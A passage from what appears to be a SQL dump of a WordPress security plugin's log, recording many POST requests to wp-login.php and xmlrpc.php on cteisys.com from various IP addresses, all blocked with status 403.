Safari\\/537.36\"}','Y08XLODBMzHtWdprE4fy7uGN',0,1665027729.4163,17347,'','POST',403,0,600,0,1,'',0),('103.195.185.149',1740880277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NCJRAXnfGb2csDtFWM8Equyr',0,1665028114.0503,19638,'','POST',403,0,515,0,1,'',0),('124.40.255.186',2083061690,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LtDcdCEY170flr5NHg3FioT6',0,1665028470.2354,18586,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BVNr6zeAU7PSqEs9ulbCtwZ4',0,1665028846.1117,19402,'','POST',403,0,515,0,1,'',0),('82.166.39.15',1386620687,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','phH2UBXNY3l80MC4Go9bEeDT',0,1665030167.6336,1294,'','POST',403,0,600,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aZUTAWkvgJnON9PDMHxbSBt0',0,1665030699.2955,19089,'','POST',403,0,515,0,1,'',0),('185.9.19.107',3104379755,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nbPWwt1Vs2reAHZNxCILchyg',0,1665030820.6118,7708,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pgVlIywFt3PYreKf9BRisJ8M',0,1665031040.0667,1631,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','vZl4h6E9rLG7qoje8B2mdcVS',0,1665031168.2059,10050,'','POST',403,0,600,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dt6aUP3VNfbCEch9s0oILejy',0,1665031766.1233,18977,'','POST',403,0,515,0,1,'',0),('148.72.209.0',2487800064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qlvEPgHdUfI5ZcwTKyXFo4BS',0,1665032078.5047,2281,'','POST',403,0,515,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qu7shW3K8aDS4HyjPJwrnYx1',0,1665032416.0989,12527,'','POST',403,0,515,0,1,'',0),('178.128.5.109',2994734445,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','fdTwqu7PU8jtvIaiDYH2JCSZ',0,1665032497.6795,1991,'','POST',403,0,600,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','uoiXmqDrazjMSZb4y9G8p0eQ',0,1665032541.5971,1605,'','POST',403,0,600,0,1,'',0),('217.160.166.188',3651184316,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6nch5xZq7NSX9aj3QtkCmsue',0,1665032726.8782,18864,'','POST',403,0,515,0,1,'',0),('171.244.21.74',2884900170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','tWj2fYDP9CUKevkzwpnGbIyM',0,1665033377.8403,18953,'','POST',403,0,515,0,1,'',0),('194.242.56.232',3270654184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rV1ZYxu8idn2q0UE5sFozRPI',0,1665033720.2192,19352,'','POST',403,0,515,0,1,'',0),('103.204.128.101',1741455461,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4WXcgurLvj3Gs8Qb6fHenDBx',0,1665034024.8463,2200,'','POST',403,0,515,0,1,'',0),('192.163.195.60',3231957820,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','abvgGterUcsXZFO6CKWHYVEw',0,1665034329.5906,10456,'','POST',403,0,515,0,1,'',0),('157.245.38.42',2650089002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WHZVsX2Yzdtcgu8QivAMhanm',0,1665034617.2280,1863,'','POST',403,0,515,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','ij90ZzrEFRO41PUDekcsWoyx',0,1665034867.6910,6669,'','POST',403,0,600,0,1,'',0),('159.89.164.128',2673452160,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','Yj4PToxfBk1azpedv3HigMJr',0,1665034910.0640,1392,'','POST',403,0,600,0,1,'',0),('185.195.237.203',3116625355,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QIdGCusmngLM1lkOv3Hji6rh',0,1665034947.2266,941,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1BfSI4ueWoi3LHFa9yTKd7rm',0,1665034948.7309,551,'','POST',403,0,515,0,1,'',0),('155.133.142.66',2609221186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TlC45WRJdwoc9Zz0DkSMAjGm',0,1665035612.6450,18654,'','POST',403,0,515,0,1,'',0),('31.184.242.14',532214286,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O6vDVmxZweiIJ25EBo4QUdTr',0,1665035953.8040,13793,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VS1ofLbqFTgcpn5u7MJC0rzt',0,1665036297.3380,20405,'','POST',403,0,515,0,1,'',0),('199.249.230.42',3355043370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ePH8lszG0AdRWn2Zct71jaLq',0,1665036414.5530,1633,'','POST',403,0,515,0,1,'',0),('131.153.50.250',2207855354,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ck79iNQ2VUPdoafTyGpuBl6x',0,1665036994.7089,18696,'','POST',403,0,515,0,1,'',0),('54.37.254.14',908459534,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','WvxGC9N1PTZJO4scafbhnd2o',0,1665037264.6707,19128,'','POST',403,0,600,0,1,'',0),('111.90.150.171',1868207787,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2wxG1WjYE0FInqV3HCZKehM7',0,1665037378.1801,18809,'','POST',403,0,515,0,1,'',0),('161.35.193.62',2703475006,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DpjcmWk8RlqT4fKwHG1IdQzu',0,1665037746.1271,19716,'','POST',403,0,515,0,1,'',0),('185.200.117.131',3116922243,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RENLHdGDYiAFTvSx5MBPIsOJ',0,1665038531.0343,18451,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JbufEBOvSAkcKyq02pm5x7ld',0,1665038899.7373,19964,'','POST',403,0,515,0,1,'',0),('157.245.166.98',2650121826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0PyTA8qVMezQxwKjIbG92cHl',0,1665039269.1960,18447,'','POST',403,0,515,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','k9Si6H51wmDoVRK4xlrtPec7',0,1665039670.5218,17766,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','e6VhBfkJp0Cc2Y7XFIKimar1',0,1665039715.4745,8253,'','POST',403,0,600,0,1,'',0),('97.79.239.127',1632628607,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S1u6t93UMaKslBo7ZPGxcbLh',0,1665040072.7506,2911,'','POST',403,0,515,0,1,'',0),('207.55.255.20',3476553492,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n6gUoARPMms8W5ap0ZuiJCqD',0,1665040475.9625,19226,'','POST',403,0,515,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SFZrOztkuP0KIB9g6aLsVDCv',0,1665041299.2235,19179,'','POST',403,0,515,0,1,'',0),('64.227.39.41',1088628521,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','j9QVRxedCvOhcwfyL2IB7bpm',0,1665042083.5993,19530,'','POST',403,0,600,0,1,'',0),('137.184.140.67',2310573123,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vjOyKwoCgpBn85EZrAfT2X4c',0,1665042109.0743,2511,'','POST',403,0,515,0,1,'',0),('206.189.60.87',3468508247,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','rUJZGY67ma5Qs8BvwzMlf14b',0,1665042129.6964,697,'','POST',403,0,600,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jEVNnC86P0YQ3hSFWMbU5Bvs',0,1665042512.7079,19268,'','POST',403,0,515,0,1,'',0),('159.65.58.34',2671852066,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Dzef5GrCObWqkSxp04Xc2L7i',0,1665042941.7159,20009,'','POST',403,0,515,0,1,'',0),('178.128.221.106',2994789738,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pfJhoK1PwQIgtCN6qGm2RbSX',0,1665043778.3140,18602,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XhyeDFa0QudMUYT47iNn9IVb',0,1665044233.3802,18979,'','POST',403,0,515,0,1,'',0),('192.64.82.118',3225440886,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','nqoRS8HXhr56ufzWet3EsFiQ',0,1665044542.7513,17653,'','POST',403,0,600,0,1,'',0),('164.92.66.133',2757509765,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Js8tvBcMZAjS5KwXz943nuOh',0,1665044640.1340,10765,'','POST',403,0,515,0,1,'',0),('101.99.95.162',1701011362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JvCy0b7GLWlnkHmPz6qS1e8o',0,1665045103.2689,19534,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','q3ABuQCaDbIfTnltSN9JMrpm',0,1665045991.6003,19034,'','POST',403,0,515,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BlxFm2otSPUKaD4NIwrTc3v5',0,1665046434.0662,18594,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GvrSlWCkENQgM3fLoZ9ndKUh',0,1665046880.3869,19000,'','POST',403,0,515,0,1,'',0),('142.93.203.156',2388511644,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','pP3O84wuoBxYSdeglKNtRT0J',0,1665046906.9951,1228,'','POST',403,0,600,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','tsLh5IcnS1mfpOoYd6e8DyH3',0,1665046951.9001,554,'','POST',403,0,600,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HYmRv245LP7iEwJe83VNFnpg',0,1665047323.2263,19203,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tCWh8xEB7wyb2apcH6S1urvf',0,1665047783.1004,18645,'','POST',403,0,515,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z645AwhyMab1fg3TeVQ9DWXd',0,1665048264.6841,1560,'','POST',403,0,515,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4aSDwtq0dGRPF1r7yQNYh8TA',0,1665048711.5900,19744,'','POST',403,0,515,0,1,'',0),('134.19.179.171',2249438123,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8p5Rf6DYAmohVnCTExkiMS3K',0,1665048744.1025,513,'','POST',403,0,515,0,1,'',0),('82.165.184.74',1386592330,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','aQFu8Rme3p4YDzo6bwPlydjx',0,1665049325.2653,1314,'','POST',403,0,600,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','zvKdyGU8Qeh63Abq79lgCD0f',0,1665049368.1263,1320,'','POST',403,0,600,0,1,'',0),('194.233.66.131',3270066819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7NdhGqZB65px319isAXYnVuS',0,1665049621.8700,18306,'','POST',403,0,515,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ig8l7O4ynk1NrhAous03CQdI',0,1665050114.2725,18466,'','POST',403,0,515,0,1,'',0),('146.70.61.131',2454076803,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hxCSUntTrD57bWzg4YoFXQZs',0,1665050364.9759,18404,'','POST',403,0,515,0,1,'',0),('190.171.170.94',3198921310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','E5Gv6HWfq7y9xDrOV4TpiBnz',0,1665050545.4810,18995,'','POST',403,0,515,0,1,'',0),('16.162.114.74',279081546,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gJj3KrywoN0tz14EW7dfLSR5',0,1665051502.9127,19453,'','POST',403,0,515,0,1,'',0),('34.69.109.132',574975364,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Yyz0ia5A6drxKR1Gjgwo3NPW',0,1665051735.5822,17621,'','POST',403,0,600,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','GSvcZbkrfCAaoOLq9j0QzP6E',0,1665051779.4206,1474,'','POST',403,0,600,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qeNpHYRITzsvXaU64hEQwDcM',0,1665051986.8765,19118,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cOEDwLrtbk0KG6vnfo3RBMJU',0,1665052993.0291,18735,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VKIfyhziuY8c39bLtNovGPXa',0,1665053460.9754,18831,'','POST',403,0,515,0,1,'',0),('104.219.251.247',1759247351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Nhf6A2CHDsu1Fl0BkyQvP79S',0,1665053980.5198,2514,'','POST',403,0,515,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.74.9 (KHTML, like Gecko) Version\\/7.0.2 Safari\\/537.74.9\"}','MtHaifOT7SbYrRKqJ5hyjpCE',0,1665054015.5923,1640,'','POST',403,0,600,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','bxftGmyzqJ6WvnrN0A1CMBPV',0,1665054182.3657,4962,'','POST',403,0,600,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/34.0.1847.116 Chrome\\/34.0.1847.116 Safari\\/537.36\"}','VQtmeSOMGf9KJBLa8ocWYwpy',0,1665054316.5174,690,'','POST',403,0,600,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9LMXYgpRu7oWIJbnzOm3TEAB',0,1665054967.6419,18473,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','32AWwnEOiQKjseHNVCBt1qJI',0,1665055483.8467,19659,'','POST',403,0,515,0,1,'',0),('134.19.179.171',2249438123,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XYTve3O507iypWlaNMzmot6I',0,1665055668.4454,1511,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BTtDcafse75CFSvkJruAKpog',0,1665055992.2893,18717,'','POST',403,0,515,0,1,'',0),('139.28.218.235',2333924075,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LMOt6RZoxf7vjCN3YgXKlUFb',0,1665056565.3846,10488,'','POST',403,0,515,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','yMBG5O8PgUoZabESzL6RqXQH',0,1665056664.8623,1413,'','POST',403,0,600,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','Uve375A4s1iDoymVSPl8Z6ah',0,1665056711.9328,1544,'','POST',403,0,600,0,1,'',0),('187.32.188.214',3139484886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5dsHzcWxTrPhUK3tJmnk1LGy',0,1665057004.6666,3170,'','POST',403,0,515,0,1,'',0),('199.249.230.7',3355043335,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hnDfX7exU30IBkNZpgrlCmQG',0,1665057079.3915,1556,'','POST',403,0,515,0,1,'',0),('199.249.230.7',3355043335,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EobX1Kujf2TemzvLCcGRrh6n',0,1665057229.3216,1279,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KLSH5Axqy7dGh4Dbmlw81riN',0,1665058057.1983,9188,'','POST',403,0,515,0,1,'',0),('184.75.221.171',3091979691,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hTGqPkxR5NsZlAt9CBJSc6QE',0,1665058892.5984,11967,'','POST',403,0,515,0,1,'',0),('195.225.76.130',3286322306,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2OlAuWbVqpeLX5PSH179zgxT',0,1665059389.0896,575,'','POST',403,0,600,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 